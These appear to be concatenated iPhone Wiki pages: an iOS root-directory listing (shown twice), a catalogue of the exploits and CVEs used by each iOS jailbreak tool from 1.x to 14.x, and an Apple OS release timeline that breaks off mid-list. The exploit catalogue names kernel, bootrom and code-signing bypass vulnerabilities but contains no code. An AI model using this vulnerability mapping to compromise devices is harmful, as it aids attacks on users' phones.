=== Folders ===
* {{ipfw|.ba}}
* {{ipfw|.HFS+ Private Directory Data}} (not present in the newer iOS versions)
* {{ipfw|.mb}}
* {{ipfw|AppleInternal}} ([[Apple Internal Apps|Apple Internal apps]] and [[Prototype Firmware|prototypes]]; only present in some internal iOS versions)
* {{ipfw|Applications}}
* {{ipfw|bin}}
* {{ipfw|boot}} (not present in the newer iOS versions)
* {{ipfw|cores}}
* {{ipfw|dev}}
* {{ipfw|Developer}}
* {{ipfw|private/etc|etc}} ([[wikipedia:Symbolic link|symlink]] to <code>/private/etc</code>)
* {{ipfw|Library}}
* {{ipfw|lib}} (not present in the jailed iOS)
* {{ipfw|mnt}}
* {{ipfw|private}}
* {{ipfw|sbin}}
* {{ipfw|System}}
* {{ipfw|private/var/tmp|tmp}} (symlink to <code>/private/var/tmp</code>)
* {{ipfw|private/var/mobile|User}} (symlink to <code>/private/var/mobile</code> ({{ipfw|private/var/root|/private/var/root}} on [[iOS|iPhone OS]] 1.1.2 and below)
* {{ipfw|usr}}
* {{ipfw|private/var|var}} (symlink to <code>/private/var</code>)

=== Files ===
* {{ipfw|.file}}
* {{ipfw|.Trashes}}

== External Links ==
* [http://refspecs.linuxfoundation.org/FHS_2.3/fhs-2.3.html Filesystem Hierachy Standard 2.3]
* [https://developer.apple.com/library/mac/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html File System Basics (Apple)]
[[Category:Filesystem]]

Jailbreak Exploits

2021-02-28T01:31:04Z

Inflatable Man: /* Programs used to jailbreak 14.x */ Added unc0ver 14's exploit

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

12.4.2 - 12.4.8

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

===[[checkra1n]] (12.3 - 12.4.8)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===

13.0 - 13.3 (before version 5.0.0)

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)

* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[Odyssey]] (13.0 - 13.7)===

13.0 - 13.5

* tardy0n (LightSpeed) ({{cve|2020-9859}})

13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)

* FreeTheSandbox_LPE_POC_13.7

13.5.1 - 13.7 (for devices with A8/A9 SoCs)

* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})

===[[checkra1n]] (13.0 - 13.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 14.x ==

===[[checkra1n]] (14.0 - 14.2~b)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

===[[unc0ver]] (14.0 - 14.3)===

* (untitled exploit) ({{cve|2021-1782}})

/

2021-02-23T18:06:55Z

Inflatable Man: /* Folders */ .HFS+ Private Directory Data was removed

__NOTOC__
This is the root directory for [[iOS]]. The firmware listing of these folders follow very closely to the [[wikipedia:Filesystem Hierarchy Standard|Filesystem Hierarchy Standard]] for [[wikipedia:Unix|Unix]] and [[wikipedia:Unix-like|Unix-like]] [[wikipedia:Operating system|operating systems]].

== Children ==
=== Folders ===
* {{ipfw|.ba}}
* {{ipfw|.HFS+ Private Directory Data}} (not present in the newer iOS versions)
* {{ipfw|.mb}}
* {{ipfw|AppleInternal}} ([[Apple Internal Apps|Apple Internal apps]] and [[Prototype Firmware|prototypes]]; only present in some internal iOS versions)
* {{ipfw|Applications}}
* {{ipfw|bin}}
* {{ipfw|boot}} (not present in the newer iOS versions)
* {{ipfw|cores}}
* {{ipfw|dev}}
* {{ipfw|Developer}}
* {{ipfw|private/etc|etc}} ([[wikipedia:Symbolic link|symlink]] to <code>/private/etc</code>)
* {{ipfw|Library}}
* {{ipfw|lib}} (not present in the newer iOS versions)
* {{ipfw|mnt}}
* {{ipfw|private}}
* {{ipfw|sbin}}
* {{ipfw|System}}
* {{ipfw|private/var/tmp|tmp}} (symlink to <code>/private/var/tmp</code>)
* {{ipfw|private/var/mobile|User}} (symlink to <code>/private/var/mobile</code> ({{ipfw|private/var/root|/private/var/root}} on [[iOS|iPhone OS]] 1.1.2 and below)
* {{ipfw|usr}}
* {{ipfw|private/var|var}} (symlink to <code>/private/var</code>)

=== Files ===
* {{ipfw|.file}}
* {{ipfw|.Trashes}}

== External Links ==
* [http://refspecs.linuxfoundation.org/FHS_2.3/fhs-2.3.html Filesystem Hierachy Standard 2.3]
* [https://developer.apple.com/library/mac/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html File System Basics (Apple)]
[[Category:Filesystem]]

Timeline

2021-02-23T13:11:19Z

Inflatable Man: /* July */ Fixes typo

{{float toc|right}}
{{see also|The iPhone Wiki:Current events}}
== 2021 ==
=== February ===
* 17 February -- macOS 11.3 beta 2 released.
* 16 February -- iOS/iPadOS 14.5 beta 2, tvOS 14.5 beta 2, and watchOS 7.4 beta 2 released.
* 15 February -- watchOS 7.3.1 for [[Apple Watch Series 5]] and [[Apple Watch SE]] and macOS 11.2.1 (20D75) released.
* 9 February -- macOS 11.2.1 (20D74) released.
* 4 February -- Revised iOS/iPadOS 14.5 beta released.
* 2 February -- macOS 11.3 beta released.
* 1 February -- audioOS 14.5 beta, iOS/iPadOS 14.5 beta, tvOS 14.5 beta, and watchOS 7.4 beta released.

=== January ===
* 28 January -- macOS 11.2 [[Release Candidate|RC]] 3 released.
* 26 January -- audioOS 14.4, iOS/iPadOS 14.4, tvOS 14.4, and watchOS 7.3 released.
* 25 January -- macOS 11.2 [[Release Candidate|RC]] 2 released.
* 21 January -- audioOS 14.4 [[Release Candidate|RC]], macOS 11.2 [[Release Candidate|RC]], iOS/iPadOS 14.4 [[Release Candidate|RC]], tvOS 14.4 [[Release Candidate|RC]], and watchOS 7.3 [[Release Candidate|RC]] released.
* 13 January -- audioOS 14.4 beta 2, macOS 11.2 beta 2, iOS/iPadOS 14.4 beta 2, tvOS 14.4 beta 2, and watchOS 7.3 beta 2 released.
* 11 January -- iOS/iPadOS 12.5.1 released.

== 2020 ==
=== December ===
* 16 December -- audioOS 14.4 beta, macOS 11.2 beta, iOS/iPadOS 14.4 beta, tvOS 14.4 beta, and watchOS 7.3 beta released.
* 15 December -- audioOS 14.3 released.
* 14 December -- bridgeOS 5.1, macOS 11.1, iOS/iPadOS 12.5 and 14.3, tvOS 14.3, Apple TV Software Update 7.6.2/iOS 8.4.6, and watchOS 6.3 and 7.2 released.
* 10 December -- macOS 11.1 [[Release Candidate|RC]], iOS/iPadOS 14.3 [[Release Candidate|RC]] 2 released.
* 8 December -- audioOS 14.3 [[Release Candidate|RC]], iOS/iPadOS 14.3 [[Release Candidate|RC]], tvOS 14.3 [[Release Candidate|RC]], and watchOS 7.2 [[Release Candidate|RC]] released.
* 7 December -- audioOS 14.2.1 released.
* 2 December -- [[Chimera]] updated to support up to 12.4.9 on pre-A12. audioOS 14.3 beta 3, iOS/iPadOS 14.3 beta 3, tvOS 14.3 beta 3, and watchOS 7.2 beta 3 released.

=== November ===
* 20 November -- [[Odyssey]] 1.2 released for iOS 13.0-13.7.
* 19 November -- iOS 14.2.1 for all iPhone 12 models released.
* 18 November -- iOS 14.2 (18B111) for all iPhone 12 models, audioOS 14.3 beta 2, tvOS 14.3 beta 2, and watchOS 7.2 beta 2 released.
* 17 November -- iOS/iPadOS 14.3 beta 2 released.
* 12 November -- audioOS 14.3 beta, iOS/iPadOS 14.3 beta, tvOS 14.3 beta, and watchOS 7.2 beta released.
* 5 November -- audioOS 14.2, iOS/iPadOS 12.4.9 and 14.2, tvOS 14.2, watchOS 5.3.9, 6.2.9 and 7.1, and 7.6.1/8.4.4 (12H911) for [[Apple TV (3rd generation)]] released.
* 2 November —- tvOS 14.2 RC and watchOS 7.1 RC released.

=== October ===
* 30 October —- iOS/iPadOS 14.2 Release Candidate (RC) released.
* 22 October -- watchOS 7.1 beta 4 released.
* 20 October -- iOS/iPadOS 14.1, audioOS 14.1, and tvOS 14.2 beta 4 released.
* 19 October -- watchOS 7.0.3 for [[Apple Watch Series 3]] released.
* 13 October -- audioOS 14.2 beta 3, iOS/iPadOS 14.1 [[Golden Master|GM]], 14.2 beta 3, tvOS 14.2 beta 3, and watchOS 7.1 beta 3 released. [[iPhone 12 mini]], [[iPhone 12]], [[iPhone 12 Pro]], and [[iPhone 12 Pro Max]] announced.
* 12 October -- watchOS 7.0.2 released.
* 5 October -- tvOS 14.0.2 released.

=== September ===
* 29 September -- audioOS 14.2 beta 2, iOS/iPadOS 14.2 beta 2, tvOS 14.2 beta 2, and watchOS 7.1 beta 2 released.
* 24 September -- iOS/iPadOS 14.0.1, tvOS 14.0.1 and watchOS 7.0.1 released.
* 23 September -- iPadOS 14.2 beta (18B5052i) for [[iPad (8th generation)]] released.
* 17 September -- audioOS 14.2 beta, iOS/iPadOS 14.2 beta, tvOS 14.2 beta, and watchOS 7.1 beta released.
* 16 September -- iOS/iPadOS 14.0, tvOS 14.0, watchOS 7.0, and 7.6/8.4.4 (12H903) for [[Apple TV (3rd generation)]] released.
* 15 September -- iOS/iPadOS 14.0 [[Golden Master|GM]], tvOS 14.0 [[Golden Master|GM]], and watchOS 7.0 [[Golden Master|GM]] released. [[iPad (8th generation)]], [[iPad Air (4th generation)]], [[Apple Watch SE]] and [[Apple Watch Series 6]] announced at "Time Flies" Event.
* 9 September -- audioOS 14.1 beta 8, iOS/iPadOS 14.0 beta 8, tvOS 14.0 beta 8, and watchOS 7.0 beta 8 released.
* 3 September -- audioOS 14.1 beta 7, iOS/iPadOS 14.0 beta 7, and tvOS 14.0 beta 7 released.
* 1 September -- iOS/iPadOS 13.7 released.

=== August ===
* 29 August -- [[Odyssey]] released to jailbreak iOS/iPadOS 13.0-13.5 on A9-A13 semi-untethered.
* 26 August -- iOS/iPadOS 13.7 beta released.
* 25 August -- audioOS 14.1 beta 6, iOS/iPadOS 14.0 beta 6, tvOS 14.0 beta 6, and watchOS 7.0 beta 6 released.
* 18 August -- audioOS 14.1 beta 5, iOS/iPadOS 14.0 beta 5, tvOS 14.0 beta 5, and watchOS 7.0 beta 5 released.
* 12 August -- iOS/iPadOS 13.6.1 released.
* 4 August -- audioOS 14 beta 4, iOS/iPadOS 14.0 beta 4, tvOS 14.0 beta 4, and watchOS 7.0 beta 4 released.

=== July ===
* 22 July -- audioOS 14 beta 3, iOS/iPadOS 14.0 beta 3, tvOS 14.0 beta 3, and watchOS 7.0 beta 3 released.
* 9 July -- iOS/iPadOS 13.6 [[Golden Master|GM]], tvOS 13.4.8 [[Golden Master|GM]], and watchOS 6.2.8 [[Golden Master|GM]] released. First public beta's of iOS 14 and tvOS 14 released.
* 7 July -- audioOS 14 beta 2, iOS/iPadOS 14.0 beta 2, tvOS 14.0 beta 2, and watchOS 7.0 beta 2 released.

=== June ===
* 30 June -- iOS/iPadOS 13.6 beta 3, tvOS 13.4.8 beta 3, and watchOS 6.2.8 beta 3 released.
* 22 June -- audioOS 14 beta, iOS 14, tvOS 14 and watchOS 7 announced with first beta released.
* 10 June -- watchOS 6.2.8 beta 2 released.
* 9 June -- iOS/iPadOS 13.6 beta 2 and tvOS 13.4.8 beta 2 released.
* 3 June -- tvOS 13.4.8 beta and watchOS 6.2.8 beta released.
* 1 June -- audioOS 13.4.6, iOS/iPadOS 13.5.1 and 13.5.5 beta, tvOS 13.4.6 and watchOS 6.2.6 released.

=== May ===
* 26 May -- [[unc0verTV]] 5.1.0~b1 released to jailbreak [[J42dAP|Apple TV HD]] and [[J105aAP|Apple TV 4K]] running tvOS 11.0 through 13.4.5.
* 23 May -- [[unc0ver]] updated to 5.0.0 to jailbreak devices running iOS 11.0 through 13.5.
* 20 May -- iOS 12.4.7, iOS/iPadOS 13.5, tvOS 13.4.5 and audioOS 13.4.5 released.
* 18 May -- iOS/iPadOS 13.5 [[Golden Master|GM]], tvOS 13.4.5 [[Golden Master|GM]], watchOS 5.3.7 and watchOS 6.2.5 released.
* 14 May -- watchOS 6.2.5 beta 5 released.
* 6 May -- iOS/iPadOS 13.5 beta 4, tvOS 13.4.5 beta 4 and watchOS 6.2.5 beta 4 released.

=== April ===
* 29 April -- iOS/iPadOS 13.5 beta 3, tvOS 13.4.5 beta 3, and watchOS 6.2.5 beta 3 released.
* 23 April -- iOS 13.4.1 released for [[D79AP|iPhone SE (2nd generation)]].
* 15 April -- iOS/iPadOS 13.4.5 beta 2, tvOS 13.4.5 beta 2, and watchOS 6.2.5 beta 2 released.
* 8 April -- watchOS 6.2.1 released.
* 7 April -- iOS/iPadOS 13.4.1 released.
* 1 April -- watchOS 6.2.5 beta released.

=== March ===
* 31 March -- iOS/iPadOS 13.4.5 beta and tvOS 13.4.5 beta released.
* 24 March -- audioOS 13.4, bridgeOS 4.4, iOS 12.4.6, iOS/iPadOS 13.4, tvOS 13.4, Apple TV Software Update 7.5, watchOS 5.3.6 and 6.2 released.
* 18 March -- iOS/iPadOS 13.4 beta 6, tvOS 13.4 beta 6 and watchOS 6.2 beta 6 released.
* 11 March -- watchOS 6.2 beta 5 released.
* 10 March -- iOS/iPadOS 13.4 beta 5 and tvOS 13.4 beta 5 released.
* 4 March -- watchOS 6.2 beta 4 released.
* 3 March -- iOS/iPadOS 13.4 beta 4 and tvOS 13.4 beta 4 released.

=== February ===
